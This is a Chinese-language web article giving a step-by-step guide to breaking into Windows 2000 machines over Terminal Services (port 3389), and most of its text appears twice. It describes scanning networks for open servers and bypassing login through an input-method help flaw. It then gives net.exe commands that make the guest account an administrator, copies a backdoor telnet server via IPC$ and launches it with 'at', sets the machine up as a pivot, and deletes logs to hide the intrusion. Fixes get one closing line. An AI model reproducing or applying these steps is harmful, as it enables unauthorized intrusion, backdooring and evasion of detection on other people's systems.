3389端口攻擊方法
互聯(lián)網(wǎng) 發(fā)布時間:2008-10-08 19:37:40 作者:佚名
我要評論
WIN2000中文簡體版存在的輸入法漏洞,可以使本地用戶繞過身分驗證機制進入系統(tǒng)內(nèi)部。經(jīng)實驗,WIN2000中文簡體版的終端服務(wù),在遠程操作時仍然存在這一漏洞,而且危害更大。
WIN2000的終端服務(wù)功能,能使系統(tǒng)管理員對WIN2000進行遠程操作,采用的是圖形界面,能使用戶在
WIN2000中文簡體版存在的輸入法漏洞,可以使本地用戶繞過身分驗證機制進入系統(tǒng)內(nèi)部。經(jīng)實驗,WIN2000中文簡體版的終端服務(wù),在遠程操作時仍然存在這一漏洞,而且危害更大。
WIN2000的終端服務(wù)功能,能使系統(tǒng)管理員對WIN2000進行遠程操作,采用的是圖形界面,能使用戶在遠程控制計算機時功能與在本地使用一樣,其默認端口為3389,用戶只要裝了WIN2000的客戶端連接管理器就能與開啟了該服務(wù)的計算機相聯(lián)。因此這一漏洞使終端服務(wù)成為WIN2000的合法木馬。
工具:客戶端連接管理器,下載地址:http://minisql.51.net/rj/WIN.zip,端口掃描器一個,推薦使用:流光、網(wǎng)絡(luò)刺客2、superscan。
入侵步驟: 一,獲得管理員賬號。
我們先對一個網(wǎng)段進行掃描,掃描端口設(shè)為3389,運行客戶端連接管理器,將掃描到的任一地址加入到,設(shè)置好客戶端連接管理器,然后與服務(wù)器連結(jié)。幾秒鐘后,屏幕上顯示出WIN2000登錄界面(如果發(fā)現(xiàn)是英文或繁體中文版,放棄,另換一個地址),用CTRL SHIFT快速切換輸入法,切換至全拼,這時在登錄界面左下角將出現(xiàn)輸入法狀態(tài)條(如果沒有出現(xiàn),請耐心等待,因為對方的數(shù)據(jù)流傳輸還有一個過程)。用右鍵點擊狀態(tài)條上的微軟徽標,彈出“幫助”(如果發(fā)現(xiàn)“幫助”呈灰色,放棄,因為對方很可能發(fā)現(xiàn)并已經(jīng)補上了這個漏洞),打開“幫助”一欄中“操作指南”,在最上面的任務(wù)欄點擊右鍵,會彈出一個菜單,打開“跳至URL”。此時將出現(xiàn)WIN2000的系統(tǒng)安裝路徑和要求我們填入的路徑的空白欄。比如,該系統(tǒng)安裝在C盤上,就在空白欄中填入"c:\winnt\system32"。然后按“確定”,于是我們就成功地繞過了身份驗證,進入了系統(tǒng)的SYSTEM32目錄。
現(xiàn)在我們要獲得一個賬號,成為系統(tǒng)的合法用戶。在該目錄下找到"net.exe",為"net.exe"創(chuàng)建一個快捷方式,右鍵點擊該快捷方式,在“屬性”->“目標”->c:\winnt\system32\net.exe后面空一格,填入"user
guest /active :yes"點“確定”。這一步驟目的在于用net.exe激活被禁止使用的guest賬戶,當然也可以利用"user
用戶名 密碼/add",創(chuàng)建一個新賬號,但容易引起網(wǎng)管懷疑。運行該快捷方式,此時你不會看到運行狀態(tài),但guest用戶已被激活。然后又修改該快捷方式,填入"user
guest 密碼",運行,于是guest便有了密碼。最后,再次修改,填入“localgroup administrators guest
/add,將guest變成系統(tǒng)管理員。
注意事項:1、在這過程中,如果對方管理員正在使用終端服務(wù)管理器,他將看到你所打開的進程id,你的ip和機器名,甚至能夠給你發(fā)送消息。
2、終端服務(wù)器在驗證你的身份的時候只留給了你一分鐘的時間,在這一分鐘內(nèi)如果你不能完成上述操作,你只能再連結(jié)。
3、你所看到的圖像與操作會有所延遲,這受網(wǎng)速的影響。二,創(chuàng)建跳板。
再次登錄終端用務(wù)器,以"guest"身份進入,此時guest已是系統(tǒng)管理員,已具備一切可執(zhí)行權(quán)。打開“控制面板”,進入“網(wǎng)絡(luò)和拔號連接”,在“本地連接”或“拔號連接”中查看屬性,看對方是否選擇“Microsoft
網(wǎng)絡(luò)的文件和打印機共享”,如果沒有,就打上勾。對方如果使用的是拔號上網(wǎng),下次拔號網(wǎng)絡(luò)共享才會打開。退出對方系統(tǒng),在本地機命令提示符下,輸入 net use
\\IP Address\IPC$ ["password"] /user:"guset",通過IPC的遠程登陸就成功了。
登陸成功之后先復(fù)制一個Telnet的程序上去(小榕流光安裝目錄下的Tools目錄里的Srv.exe,另外,還有ntml.xex,一會要用),這個程序是在對方上面開一個Telnet服務(wù),端口是99。
copy c:\hack\srv.exe \\***.***.***.***\admin$ 然后利用定時服務(wù)啟動它,先了解對方的時間: net time
\\***.***.***.*** 顯示: \\***.***.***.*** 的當前時間是 2001/1/8 下午 08:55 命令成功完成。
然后啟動srv.exe: at \\***.***.***.*** 09:00 srv.exe 顯示: 新加了一項作業(yè),其作業(yè) ID = 0
過幾分鐘后,telnet ***.***.***.*** 99 這里不需要驗證身份,直接登錄,顯示: c:\winnt:\system32>
我們就成功登陸上去了。然后又在本地打開命令提示符,另開一個窗口,輸入: copy c:\hack\ntlm.exe
\\211.21.193.202\admin$ 把事先存放在hack目錄里的ntlm.exe拷過去。然后又回到剛才的telnet窗口,運行ntlm.exe
C:\WINNT\system32>ntlm 顯示: Windows 2000 Telnet Dump, by Assassin, All Rights
Reserved. Done! C:\WINNT\system32> C:\WINNT\system32>
好,現(xiàn)在我們來啟動WIN2000本身的telnet,首先終止srv.exe的telnet服務(wù): net stop
telnet 系統(tǒng)告訴你并沒有啟動telnet,不理它,繼續(xù): net start
telnet 這次真的啟動了telnet,我們可以在另開的命令提示符窗口telnet到對方的
23端口,驗證身份,輸入我們的guest賬號和密碼,它就真正成為我們的跳板了。我們可以利用它到其它的主機去。三、掃除腳?。?刪除為net.exe
創(chuàng)建的快捷方式,刪除winnt\system32\logfiles下邊的日志文件補漏方法: 1、打補丁 2、刪除輸入法幫助文件 3、停止終端服務(wù)
WIN2000的終端服務(wù)功能,能使系統(tǒng)管理員對WIN2000進行遠程操作,采用的是圖形界面,能使用戶在遠程控制計算機時功能與在本地使用一樣,其默認端口為3389,用戶只要裝了WIN2000的客戶端連接管理器就能與開啟了該服務(wù)的計算機相聯(lián)。因此這一漏洞使終端服務(wù)成為WIN2000的合法木馬。
工具:客戶端連接管理器,下載地址:http://minisql.51.net/rj/WIN.zip,端口掃描器一個,推薦使用:流光、網(wǎng)絡(luò)刺客2、superscan。
入侵步驟: 一,獲得管理員賬號。
我們先對一個網(wǎng)段進行掃描,掃描端口設(shè)為3389,運行客戶端連接管理器,將掃描到的任一地址加入到,設(shè)置好客戶端連接管理器,然后與服務(wù)器連結(jié)。幾秒鐘后,屏幕上顯示出WIN2000登錄界面(如果發(fā)現(xiàn)是英文或繁體中文版,放棄,另換一個地址),用CTRL SHIFT快速切換輸入法,切換至全拼,這時在登錄界面左下角將出現(xiàn)輸入法狀態(tài)條(如果沒有出現(xiàn),請耐心等待,因為對方的數(shù)據(jù)流傳輸還有一個過程)。用右鍵點擊狀態(tài)條上的微軟徽標,彈出“幫助”(如果發(fā)現(xiàn)“幫助”呈灰色,放棄,因為對方很可能發(fā)現(xiàn)并已經(jīng)補上了這個漏洞),打開“幫助”一欄中“操作指南”,在最上面的任務(wù)欄點擊右鍵,會彈出一個菜單,打開“跳至URL”。此時將出現(xiàn)WIN2000的系統(tǒng)安裝路徑和要求我們填入的路徑的空白欄。比如,該系統(tǒng)安裝在C盤上,就在空白欄中填入"c:\winnt\system32"。然后按“確定”,于是我們就成功地繞過了身份驗證,進入了系統(tǒng)的SYSTEM32目錄。
現(xiàn)在我們要獲得一個賬號,成為系統(tǒng)的合法用戶。在該目錄下找到"net.exe",為"net.exe"創(chuàng)建一個快捷方式,右鍵點擊該快捷方式,在“屬性”->“目標”->c:\winnt\system32\net.exe后面空一格,填入"user
guest /active :yes"點“確定”。這一步驟目的在于用net.exe激活被禁止使用的guest賬戶,當然也可以利用"user
用戶名 密碼/add",創(chuàng)建一個新賬號,但容易引起網(wǎng)管懷疑。運行該快捷方式,此時你不會看到運行狀態(tài),但guest用戶已被激活。然后又修改該快捷方式,填入"user
guest 密碼",運行,于是guest便有了密碼。最后,再次修改,填入“localgroup administrators guest
/add,將guest變成系統(tǒng)管理員。
注意事項:1、在這過程中,如果對方管理員正在使用終端服務(wù)管理器,他將看到你所打開的進程id,你的ip和機器名,甚至能夠給你發(fā)送消息。
2、終端服務(wù)器在驗證你的身份的時候只留給了你一分鐘的時間,在這一分鐘內(nèi)如果你不能完成上述操作,你只能再連結(jié)。
3、你所看到的圖像與操作會有所延遲,這受網(wǎng)速的影響。二,創(chuàng)建跳板。
再次登錄終端用務(wù)器,以"guest"身份進入,此時guest已是系統(tǒng)管理員,已具備一切可執(zhí)行權(quán)。打開“控制面板”,進入“網(wǎng)絡(luò)和拔號連接”,在“本地連接”或“拔號連接”中查看屬性,看對方是否選擇“Microsoft
網(wǎng)絡(luò)的文件和打印機共享”,如果沒有,就打上勾。對方如果使用的是拔號上網(wǎng),下次拔號網(wǎng)絡(luò)共享才會打開。退出對方系統(tǒng),在本地機命令提示符下,輸入 net use
\\IP Address\IPC$ ["password"] /user:"guset",通過IPC的遠程登陸就成功了。
登陸成功之后先復(fù)制一個Telnet的程序上去(小榕流光安裝目錄下的Tools目錄里的Srv.exe,另外,還有ntml.xex,一會要用),這個程序是在對方上面開一個Telnet服務(wù),端口是99。
copy c:\hack\srv.exe \\***.***.***.***\admin$ 然后利用定時服務(wù)啟動它,先了解對方的時間: net time
\\***.***.***.*** 顯示: \\***.***.***.*** 的當前時間是 2001/1/8 下午 08:55 命令成功完成。
然后啟動srv.exe: at \\***.***.***.*** 09:00 srv.exe 顯示: 新加了一項作業(yè),其作業(yè) ID = 0
過幾分鐘后,telnet ***.***.***.*** 99 這里不需要驗證身份,直接登錄,顯示: c:\winnt:\system32>
我們就成功登陸上去了。然后又在本地打開命令提示符,另開一個窗口,輸入: copy c:\hack\ntlm.exe
\\211.21.193.202\admin$ 把事先存放在hack目錄里的ntlm.exe拷過去。然后又回到剛才的telnet窗口,運行ntlm.exe
C:\WINNT\system32>ntlm 顯示: Windows 2000 Telnet Dump, by Assassin, All Rights
Reserved. Done! C:\WINNT\system32> C:\WINNT\system32>
好,現(xiàn)在我們來啟動WIN2000本身的telnet,首先終止srv.exe的telnet服務(wù): net stop
telnet 系統(tǒng)告訴你并沒有啟動telnet,不理它,繼續(xù): net start
telnet 這次真的啟動了telnet,我們可以在另開的命令提示符窗口telnet到對方的
23端口,驗證身份,輸入我們的guest賬號和密碼,它就真正成為我們的跳板了。我們可以利用它到其它的主機去。三、掃除腳?。?刪除為net.exe
創(chuàng)建的快捷方式,刪除winnt\system32\logfiles下邊的日志文件補漏方法: 1、打補丁 2、刪除輸入法幫助文件 3、停止終端服務(wù)
相關(guān)文章

什么是CC攻擊 判斷網(wǎng)站是否被CC攻擊并且如何防御CC攻擊
CC主要是用來攻擊頁面的,大家都有這樣的經(jīng)歷,就是在訪問論壇時,如果這個論壇比較大,訪問的人比較多,打開頁面的速度會比較慢,對不?!一般來說,訪問的人越多,論壇的頁2024-01-06
Windows系統(tǒng)安全風(fēng)險-本地NTLM重放提權(quán)
入侵者主要通過Potato程序攻擊擁有SYSTEM權(quán)限的端口偽造網(wǎng)絡(luò)身份認證過程,利用NTLM重放機制騙取SYSTEM身份令牌,最終取得系統(tǒng)權(quán)限,該安全風(fēng)險微軟并不認為存在漏洞,所以2021-04-15
這篇文章主要介紹了文件上傳漏洞全面滲透分析小結(jié),這里主要為大家分享一下防御方法,需要的朋友可以參考下2021-03-21- 這篇文章主要介紹了sql手工注入語句&SQL手工注入大全,需要的朋友可以參考下2017-09-06
- 這篇文章主要介紹了詳解Filezilla server 提權(quán),需要的朋友可以參考下2017-05-13
FileZilla Server 2008 x64 提權(quán)與防御方法
這篇文章主要介紹了FileZilla Server 2008 x64 提權(quán)與防御方法,需要的朋友可以參考下2017-05-13https加密也被破解 HEIST攻擊從加密數(shù)據(jù)獲取明文
不久之前我們說過關(guān)于http和https的區(qū)別,對于加密的https,我們一直認為它是相對安全的,可今天要講的是,一種繞過HTTPS加密得到明文信息的web攻擊方式,不知道這消息對你2016-08-10iPhone和Mac也會被黑 一條iMessage密碼可能就被盜了
一直以來蘋果系統(tǒng)的安全性都是比安卓要高的,但是再安全的系統(tǒng)也免不了漏洞,蘋果也一樣。最近爆出的新漏洞,只需要接收一條多媒體信息或者iMessage就會導(dǎo)致用戶信息泄露。2016-07-27- 國家正在修正關(guān)于黑客方面的法律法規(guī),有一條震驚黑客圈的“世紀佳緣”起訴白帽黑客事件,深深的傷害了廣大黑客們的心,加上扎克伯格和特拉維斯·卡蘭尼克賬號被盜,于是黑2016-07-11
如何逆向破解HawkEye keylogger鍵盤記錄器進入攻擊者郵箱
面對惡意郵件攻擊,我們就只能默默忍受被他攻擊,連自我保護能力都沒有談什么反抗?讓人痛快的是,如今有了解決辦法,逆向破解鍵盤記錄器,進入攻擊者郵箱2016-07-06


